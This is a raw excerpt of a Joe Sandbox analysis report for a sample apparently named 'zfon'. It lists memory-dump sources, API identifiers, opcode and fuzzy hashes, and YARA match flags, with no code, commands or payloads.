                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: __std_exception_copy__std_exception_destroy
                                                                                                • String ID:
                                                                                                • API String ID: 2960854011-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: __std_exception_copy__std_exception_destroy
                                                                                                • String ID:
                                                                                                • API String ID: 2960854011-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Setgloballocalestd::locale::_
                                                                                                • String ID:
                                                                                                • API String ID: 801953252-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                • String ID:
                                                                                                • API String ID: 593203224-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                • String ID:
                                                                                                • API String ID: 593203224-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2606324920.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7ff7f96e0000_zfon.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: cef_string_utf16_clear
                                                                                                • String ID:
                                                                                                • API String ID: 2864223729-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2606324920.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7ff7f96e0000_zfon.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: cef_string_utf16_set
                                                                                                • String ID:
                                                                                                • API String ID: 2786225788-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2606324920.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000006.00000002.2606008536.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2606835994.00007FF7F981B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2606835994.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2607973026.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2608127384.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2608223601.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2608300064.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2608364168.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7ff7f96e0000_zfon.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: cef_string_utf16_clear
                                                                                                • String ID:
                                                                                                • API String ID: 2864223729-0
                                                                                                • Opcode ID: d33a2170fbd08e1295aa745bb59190dabb63d073c9f8e86e5b0d8221db3b0f23
                                                                                                • Instruction ID: 0369f5a37d547324310c4fe1226cbfeee328ad537b4005ad5925154f25ebfc57
                                                                                                • Opcode Fuzzy Hash: d33a2170fbd08e1295aa745bb59190dabb63d073c9f8e86e5b0d8221db3b0f23
                                                                                                • Instruction Fuzzy Hash: B2F08122E1864142E780BF11ED413AD6330EB487C0FC44431E65D07AEADF3CE4928360
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 73155330-3916222277
                                                                                                • Opcode ID: 70bc9bd995cb069c2d3e0a6c96377ccbba1a305319187803a7386bcba82571ea
                                                                                                • Instruction ID: db2ed2c96bd1800d4348eb07a1793a1f13304fe1f4a1dbf8a0b007d4247f1d72
                                                                                                • Opcode Fuzzy Hash: 70bc9bd995cb069c2d3e0a6c96377ccbba1a305319187803a7386bcba82571ea
                                                                                                • Instruction Fuzzy Hash: 40719334218E1E8FDB59EF6CC098B65B7D2FB99320F60065AD41AC7691DB31EC45C782
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                • String ID: ?
                                                                                                • API String ID: 1286766494-1684325040
                                                                                                • Opcode ID: f7d8d8c17d4534d6d9581430c191c8685afda81465dcb08cdff0caec24115f1b
                                                                                                • Instruction ID: c26fd7271982db83651dbced70d27a6fff5945ef9a6dfbdba441d7dd7fed5fb2
                                                                                                • Opcode Fuzzy Hash: f7d8d8c17d4534d6d9581430c191c8685afda81465dcb08cdff0caec24115f1b
                                                                                                • Instruction Fuzzy Hash: 7E51D63422CB4A4FE768EB68946A37B7BD2EBC5325F20066FE495C21D1DA24DC41C683